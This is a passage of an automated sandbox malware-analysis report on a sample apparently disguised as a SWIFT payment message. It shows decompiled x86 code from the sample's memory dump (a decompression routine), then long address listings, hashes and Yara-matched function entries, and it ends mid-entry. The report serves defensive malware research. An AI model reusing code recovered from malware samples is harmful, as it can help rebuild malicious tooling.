											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E0040724C( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x40a5a4 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x40a5a4 + __eax * 2) & 0x0000ffff =  *(0x40a5a4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x40a5a4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E004072B4( &(__esi[3]), __edi, 0x101, 0x4084e0, 0x408520, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E004072B4(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408560, 0x40859c, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E0040724C( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}

0x00406add
0x00406add
0x00406add
0x00406add
0x00406add
0x00406ae1
0x00000000
0x00000000
0x00406ae7
0x00406ae7
0x00406aea
0x00406aed
0x00406af2
0x00406af4
0x00406af7
0x00406afa
0x00406afd
0x00406afd
0x00406b00
0x00000000
0x00000000
0x00406b02
0x00406b02
0x00406b05
0x00406b0a
0x00406b0c
0x00406b0f
0x00406b15
0x00406874
0x00406874
0x00406877
0x0040687d
0x00406883
0x0040688c
0x00406892
0x00406895
0x0040689c
0x004068a1
0x004068a7
0x004068b2
0x004068b2
0x00406b1b
0x00406b1b
0x00406b25
0x00000000
0x00000000
0x00406b2b
0x00406b2b
0x00406b2f
0x00406b32
0x00406b32
0x00406b36
0x00406b3c
0x00406b3c
0x00406b3f
0x00406b42
0x00406b48
0x00000000
0x00000000
0x00406b4a
0x00406b6c
0x00406b6c
0x00406b6f
0x00000000
0x00000000
0x00406b4c
0x00406b50
0x00000000
0x00000000
0x00406b56
0x00406b56
0x00406b59
0x00406b5c
0x00406b61
0x00406b63
0x00406b66
0x00406b69
0x00406b69
0x00406b71
0x00406b71
0x00406b77
0x00406b7a
0x00406b7d
0x00406b7d
0x00406b84
0x00406b88
0x00406b8c
0x00406b8f
0x00406b92
0x00406b98
0x00406b9d
0x00000000
0x00000000
0x00406b9f
0x00406bb3
0x00406bb3
0x00406bb7
0x00000000
0x00000000
0x00406ba1
0x00406ba4
0x00406ba4
0x00406bab
0x00406bb0
0x00406bb0
0x00406bb0
0x00406bb9
0x00406bb9
0x00406bbc
0x00406bca
0x00406bd0
0x00406bd5
0x00406bdb
0x00406be1
0x00406be7
0x00406bee
0x00406c02
0x00406c02
0x004071d1
0x004071d1
0x004071d1
0x004071d6
0x00000000
0x00000000
0x0040680e
0x0040680e
0x00000000
0x00406e09
0x00406e09
0x00406e0d
0x00406e10
0x00406e13
0x00406e16
0x00000000
0x00000000
0x00406e1c
0x00406e1c
0x00406e41
0x00406e41
0x00406e41
0x00406e43
0x00000000
0x00000000
0x00406e21
0x00406e21
0x00406e25
0x00000000
0x00000000
0x00406e2b
0x00406e2b
0x00406e2e
0x00406e31
0x00406e34
0x00406e36
0x00406e38
0x00406e3b
0x00406e3e
0x00406e3e
0x00406e3e
0x00406e45
0x00406e45
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e5a
0x00406e5d
0x00406e5f
0x00406e62
0x00406e64
0x00406e78
0x00406e78
0x00406e7b
0x00406e95
0x00406e95
0x00406e98
0x00000000
0x00000000
0x00406e9e
0x00406e9e
0x00406ea1
0x00000000
0x00000000
0x00406ea7
0x00406ea7
0x00000000
0x00406ea7
0x00406e7d
0x00406e80
0x00406e87
0x00406e8a
0x00000000
0x00406e8a
0x00406e66
0x00406e6a
0x00406e6d
0x00000000
0x00000000
0x00406eb2
0x00406eb2
0x00406ed7
0x00406ed7
0x00406ed7
0x00406ed9
0x00000000
0x00000000
0x00406eb7
0x00406eb7
0x00406ebb
0x00000000
0x00000000
0x00406ec1
0x00406ec1
0x00406ec4
0x00406ec7
0x00406eca
0x00406ecc
0x00406ece
0x00406ed1
0x00406ed4
0x00406ed4
0x00406ed4
0x00406edb
0x00406ee3
0x00406ee6
0x00406ee9
0x00406eeb
0x00406eee
0x00406eee
0x00406ef0
0x00406ef4
0x00406ef7
0x00406efa
0x00406efd
0x00000000
0x00000000
0x00406f03
0x00406f03
0x00406f28
0x00406f28
0x00406f28
0x00406f2a
0x00000000
0x00000000
0x00406f08
0x00406f08
0x00406f0c
0x00000000
0x00000000
0x00406f12
0x00406f12
0x00406f15
0x00406f18
0x00406f1b
0x00406f1d
0x00406f1f
0x00406f22
0x00406f25
0x00406f25
0x00406f25
0x00406f2c
0x00406f2c
0x00406f34
0x00406f37
0x00406f3a
0x00406f3d
0x00406f41
0x00406f44
0x00406f46
0x00406f49
0x00406f4c
0x00406f66
0x00406f66
0x00406f69
0x00000000
0x00000000
0x00406f6f
0x00406f6f
0x00406f72
0x00406f79
0x00000000
0x00406f79
0x00406f4e
0x00406f51
0x00406f58
0x00406f5b
0x00000000
0x00000000
0x00406f81
0x00406f81
0x00406fa6
0x00406fa6
0x00406fa6
0x00406fa8
0x00000000
0x00000000
0x00406f86
0x00406f86
0x00406f8a
0x00000000
0x00000000
0x00406f90
0x00406f90
0x00406f93
0x00406f96
0x00406f99
0x00406f9b
0x00406f9d
0x00406fa0
0x00406fa3
0x00406fa3
0x00406fa3
0x00406faa
0x00406fb2
0x00406fb5
0x00406fb8
0x00406fba
0x00406fbd
0x00406fbd
0x00406fbf
0x00000000
0x00000000
0x00406fc5
0x00406fc5
0x00406fc8
0x00406fcd
0x00406fcf
0x00406fd5
0x00406fd7
0x00406fec
0x00406fee
0x00406fee
0x00406fd9
0x00406fdf
0x00406fe1
0x00406fe3
0x00406fe3
0x00406ff0
0x00406ff4
0x00406ff7
0x00406ffd
0x00406ffd
0x00407000
0x00407000
0x00407000
0x00407002
0x00000000
0x00000000
0x00407008
0x00407008
0x0040700e
0x00407010
0x00407035
0x00407038
0x0040703e
0x00407043
0x00407049
0x0040704f
0x00407051
0x00407054
0x0040705d
0x00407063
0x00407063
0x00407056
0x00407058
0x0040705a
0x0040705a
0x00407065
0x0040706b
0x0040706d
0x00407070
0x00407072
0x00407078
0x0040707a
0x0040707c
0x0040707e
0x00407080
0x00407083
0x0040708c
0x0040708f
0x0040708f
0x00407085
0x00407085
0x00407088
0x00407088
0x00407083
0x0040707a
0x00407091
0x00407093
0x00000000
0x00000000
0x00000000
0x00000000
0x00407093
0x00407012
0x00407012
0x00407018
0x0040701e
0x00407020
0x00000000
0x00000000
0x00407022
0x00407022
0x00407024
0x00407026
0x0040702f
0x0040702f
0x00407028
0x00407028
0x0040702b
0x0040702b
0x00407031
0x00407033
0x00000000
0x00000000
0x00407099
0x00407099
0x0040709e
0x004070a0
0x004070a1
0x004070a2
0x004070a3
0x004070a9
0x004070ac
0x004070af
0x004070b2
0x004070b4
0x004070ba
0x004070ba
0x004070bd
0x004070bd
0x004070bd
0x004070bd
0x004070c6
0x00000000
0x00000000
0x004070cb
0x004070cb
0x004070ce
0x004070d1
0x004070d3
0x0040716a
0x0040716a
0x0040716d
0x0040716f
0x00407170
0x00407171
0x00407174
0x00000000
0x00407174
0x004070d9
0x004070d9
0x004070df
0x004070e1
0x00407106
0x00407109
0x0040710f
0x00407114
0x0040711a
0x00407120
0x00407122
0x00407125
0x0040712e
0x00407134
0x00407134
0x00407127
0x00407129
0x0040712b
0x0040712b
0x00407136
0x0040713c
0x0040713e
0x00407141
0x00407143
0x00407149
0x0040714b
0x0040714d
0x0040714f
0x00407151
0x00407154
0x0040715d
0x00407160
0x00407160
0x00407156
0x00407156
0x00407159
0x00407159
0x00407154
0x0040714b
0x00407162
0x00407164
0x00000000
0x00000000
0x00000000
0x00000000
0x00407164
0x004070e3
0x004070e3
0x004070e9
0x004070ef
0x004070f1
0x00000000
0x00000000
0x004070f3
0x004070f3
0x004070f5
0x004070f7
0x004070fe
0x004070fe
0x00407100
0x004070f9
0x004070f9
0x004070fb
0x004070fb
0x00407102
0x00407104
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040717c
0x0040717c
0x0040717f
0x00407181
0x00407184
0x00407187
0x00407187
0x00407187
0x00407187
0x00000000
0x00000000
0x00000000
0x00406835
0x00406819
0x00000000
0x0040681f
0x00406822
0x0040682c
0x0040682f
0x00406832
0x00000000
0x00406832
0x00406819
0x0040683d
0x00406840
0x00406844
0x0040684e
0x00406858
0x0040685b
0x00406861
0x00406995
0x00406997
0x0040699d
0x004069a0
0x004069a3
0x00000000
0x004069a3
0x00406867
0x00406867
0x00406868
0x004068c0
0x004068c0
0x004068c7
0x0040696d
0x0040696d
0x00406972
0x00406975
0x0040697a
0x0040697d
0x00406982
0x00406985
0x0040698a
0x0040698d
0x0040698d
0x00000000
0x004068cd
0x004068cd
0x004068cd
0x004068cd
0x004068d1
0x004068d1
0x004068f3
0x004068f6
0x004068f8
0x004068fb
0x00406900
0x004068d6
0x004068d6
0x004068db
0x004068dd
0x004068df
0x004068e4
0x004068ea
0x004068ef
0x004068f1
0x004068f1
0x004068e6
0x004068e6
0x004068e6
0x004068e4
0x00000000
0x00406902
0x0040692f
0x00406934
0x00406936
0x00406937
0x00406939
0x0040693a
0x0040693a
0x0040693a
0x00406962
0x00406967
0x00406967
0x00000000
0x00406967
0x00406900
0x004068c7
0x0040686a
0x0040686a
0x0040686b
0x004068b5
0x00000000
0x004068b5
0x0040686d
0x0040686e
0x00000000
0x00000000
0x00000000
0x00000000
0x004069ca
0x004069ca
0x004069ca
0x004069cd
0x00000000
0x00000000
0x004069aa
0x004069aa
0x004069ae
0x00000000
0x00000000
0x004069b4
0x004069b4
0x004069b7
0x004069ba
0x004069bf
0x004069c1
0x004069c4
0x004069c7
0x004069c7
0x004069c7
0x004069cf
0x004069cf
0x004069d2
0x004069d4
0x004069d9
0x004069dc
0x004069de
0x004069e1
0x00000000
0x00000000
0x004069e7
0x004069e7
0x004069e9
0x00000000
0x00000000
0x004069ef
0x004069ef
0x004069f3
0x00000000
0x00000000
0x004069f9
0x004069f9
0x004069fc
0x004069fe
0x00406a9c
0x00406a9c
0x00406a9f
0x00406aa1
0x00406aa1
0x00406aa4
0x00406aa7
0x00406aa9
0x00406aab
0x00406aad
0x00406aad
0x00406ab6
0x00406abb
0x00406abe
0x00406ac1
0x00406ac4
0x00406ac7
0x00406ac7
0x00406ac7
0x00406aca
0x00406ad0
0x00406ad0
0x00406ad6
0x00406ad6
0x00406ad6
0x00000000
0x00406aca
0x00406a04
0x00406a04
0x00406a0a
0x00406a0d
0x00406a0f
0x00406a3a
0x00406a3d
0x00406a43
0x00406a48
0x00406a4e
0x00406a54
0x00406a56
0x00406a59
0x00406a62
0x00406a68
0x00406a68
0x00406a5b
0x00406a5d
0x00406a5f
0x00406a5f
0x00406a6a
0x00406a70
0x00406a73
0x00406a75
0x00406a77
0x00406a7d
0x00406a7f
0x00406a81
0x00406a84
0x00406a8d
0x00406a8d
0x00406a8f
0x00406a86
0x00406a86
0x00406a89
0x00406a89
0x00406a91
0x00406a91
0x00406a7f
0x00406a94
0x00406a96
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a96
0x00406a11
0x00406a11
0x00406a17
0x00406a1d
0x00406a1f
0x00000000
0x00000000
0x00406a21
0x00406a21
0x00406a23
0x00406a25
0x00406a28
0x00406a2f
0x00406a2f
0x00406a31
0x00406a2a
0x00406a2a
0x00406a2c
0x00406a2c
0x00406a33
0x00406a35
0x00406a38
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b3c
0x00406b3f
0x00406b42
0x00406b48
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d1f
0x00406d1f
0x00406d1f
0x00406d22
0x00406d25
0x00406d27
0x00406d2a
0x00406d30
0x00406d37
0x00406d39
0x00000000
0x00000000
0x00406c0d
0x00406c0d
0x00406c35
0x00406c35
0x00406c35
0x00406c37
0x00000000
0x00000000
0x00406c15
0x00406c15
0x00406c19
0x00000000
0x00000000
0x00406c1f
0x00406c1f
0x00406c22
0x00406c25
0x00406c28
0x00406c2a
0x00406c2c
0x00406c2f
0x00406c32
0x00406c32
0x00406c32
0x00406c39
0x00406c39
0x00406c41
0x00406c44
0x00406c4a
0x00406c4d
0x00406c51
0x00406c55
0x00406c58
0x00406c5b
0x00406c73
0x00406c73
0x00406c76
0x00406c84
0x00406c87
0x00406c78
0x00406c78
0x00406c7a
0x00406c81
0x00406c81
0x00406cb0
0x00406cb0
0x00406cb0
0x00406cb3
0x00406cb5
0x00000000
0x00000000
0x00406c90
0x00406c90
0x00406c94
0x00000000
0x00000000
0x00406c9a
0x00406c9a
0x00406c9d
0x00406ca0
0x00406ca3
0x00406ca5
0x00406ca7
0x00406caa
0x00406cad
0x00406cad
0x00406cad
0x00406cb7
0x00406cb7
0x00406cb9
0x00406cbb
0x00406cc6
0x00406cc9
0x00406ccc
0x00406cce
0x00406cd0
0x00406cd2
0x00406cd5
0x00406cd8
0x00406cdd
0x00406ce0
0x00406ce3
0x00406ce6
0x00406ced
0x00406cf0
0x00406cf2
0x00000000
0x00000000
0x00406cf8
0x00406cf8
0x00406cfc
0x00406d0d
0x00406d0d
0x00406d0d
0x00406d0f
0x00406d0f
0x00406d13
0x00406d13
0x00406d13
0x00406d15
0x00406d16
0x00406d19
0x00406d19
0x00406d19
0x00406d1c
0x00000000
0x00406d1c
0x00406cfe
0x00406cfe
0x00406d01
0x00000000
0x00000000
0x00406d07
0x00406d07
0x00000000
0x00406d07
0x00406c5d
0x00406c5d
0x00406c5f
0x00406c61
0x00406c64
0x00406c67
0x00406c6b
0x00406c6b
0x00406d3f
0x00406d3f
0x00406d42
0x00406d49
0x00406d4d
0x00406d4f
0x00406d52
0x00406d55
0x00406d5a
0x00406d5d
0x00406d5f
0x00406d60
0x00406d63
0x00406d6e
0x00406d71
0x00406d88
0x00406d8d
0x00406d94
0x00406d99
0x00406d9d
0x00406d9f
0x00406d9f
0x00406d9f
0x00406da2
0x00406da4
0x00000000
0x00406daa
0x00406daa
0x00406dae
0x00406db9
0x00406dcc
0x00406dd1
0x00406dd6
0x00406dd8
0x00000000
0x00000000
0x00406dde
0x00406dde
0x00406de1
0x00406de3
0x00406df1
0x00406df1
0x00406df4
0x00406df4
0x00406df7
0x00406dfa
0x00406dfd
0x00406e00
0x00406e03
0x00406e06
0x00000000
0x00406e06
0x00406de5
0x00406de5
0x00406deb
0x00000000
0x00000000
0x00000000
0x00406deb
0x00000000
0x00000000
0x00000000
0x0040718a
0x0040718a
0x00407190
0x00407196
0x0040719b
0x004071a1
0x004071a7
0x004071a9
0x004071ac
0x004071b5
0x004071bb
0x004071bb
0x004071ae
0x004071b0
0x004071b2
0x004071b2
0x004071bd
0x004071bf
0x004071c2
0x004071fd
0x004071fd
0x00000000
0x004071c4
0x004071c4
0x004071c4
0x004071ca
0x004071cd
0x004071cf
0x00407204
0x00407206
0x00000000
0x00407206
0x00000000
0x004071cf
0x00000000
0x0040680e
0x004071dc
0x00000000
0x004071dc
0x00406bf0
0x00406bf2
0x00000000
0x00000000
0x00406bf4
0x00406bf4
0x00406bf7
0x00000000
0x00406bf7
0x00406b3c
0x00406afd
0x004071e1
0x004071e4
0x004071e6
0x004071ef
0x004071f5
0x00000000

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
Instruction ID: c2d777d08f91faa28cc29f4af1d325e94f95b1c5ec16d27d51274fd7273dd8ba
Opcode Fuzzy Hash: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
Instruction Fuzzy Hash: A4E18971A04709DFDB24CF59C880BAAB7F1EB44305F15852EE497AB2D1D778AA91CF04

Uniqueness

Uniqueness Score: -1.00%

Function 02AF692A Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3939f888aa466b675f3cad661cb59c0cdf7fc2690acbad2db6c1cfca76d773db
Instruction ID: cf73597c2d2e19c1f960207401317ea4bd1f0609e3185a79cee45af02007906e
Opcode Fuzzy Hash: 3939f888aa466b675f3cad661cb59c0cdf7fc2690acbad2db6c1cfca76d773db
Instruction Fuzzy Hash: 34C14631204389CFDF348F788AA53DA37B6AF997A4F85456ECC9A9F156D7344A42CB00

Uniqueness

Uniqueness Score: -1.00%

Function 02AF6927 Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b5f8e07e2127177eadba0338433a46f8275ab33035fc20b0420da304f74954f
Instruction ID: d0ac6e0cd0925d64185388b0d33724341fcb926e9d3fec18627fc073f0641b23
Opcode Fuzzy Hash: 5b5f8e07e2127177eadba0338433a46f8275ab33035fc20b0420da304f74954f
Instruction Fuzzy Hash: 61B1497120434ACFDF748E68CDA93DA33A6EF55790F95412ECC999F191D7358A42CB00

Uniqueness

Uniqueness Score: -1.00%

Function 02AF74D0 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9081b296cd78528f0d5e01dcc3f9dfff9d67c4e75bb249be2bd28c943563d1f
Instruction ID: e09c4748c73ec9c07281345c9bf6fc2770631a606dee6f040a135fc26deeda98
Opcode Fuzzy Hash: d9081b296cd78528f0d5e01dcc3f9dfff9d67c4e75bb249be2bd28c943563d1f
Instruction Fuzzy Hash: C29133306443099FDB285E688CA57EF77A6EF81790F92852EDCCA9B144D7348986CF02

Uniqueness

Uniqueness Score: -1.00%

Function 02AF6A22 Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6708d17c80f985a57a5a39a6a610d0716001b0d201296ebbe6df61938d475da2
Instruction ID: cfc55bb000a74ee954751021bac76996398f6101a5f164b391e92c02b5d446b7
Opcode Fuzzy Hash: 6708d17c80f985a57a5a39a6a610d0716001b0d201296ebbe6df61938d475da2
Instruction Fuzzy Hash: B0A14831204389CFDF348F788AA93DA3776AF997A4F85456ECC9AAF155D7304A46CB00

Uniqueness

Uniqueness Score: -1.00%

Function 02AF6C7E Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4961dadb1dca141c20613297683d6af8f1867afb12d6a402e0ff6f1dfd6e6b1a
Instruction ID: 7ea698d8dde09ea09d78d13c9d659970e7d2e31a6c545d276f9a46cb60eb3fb6
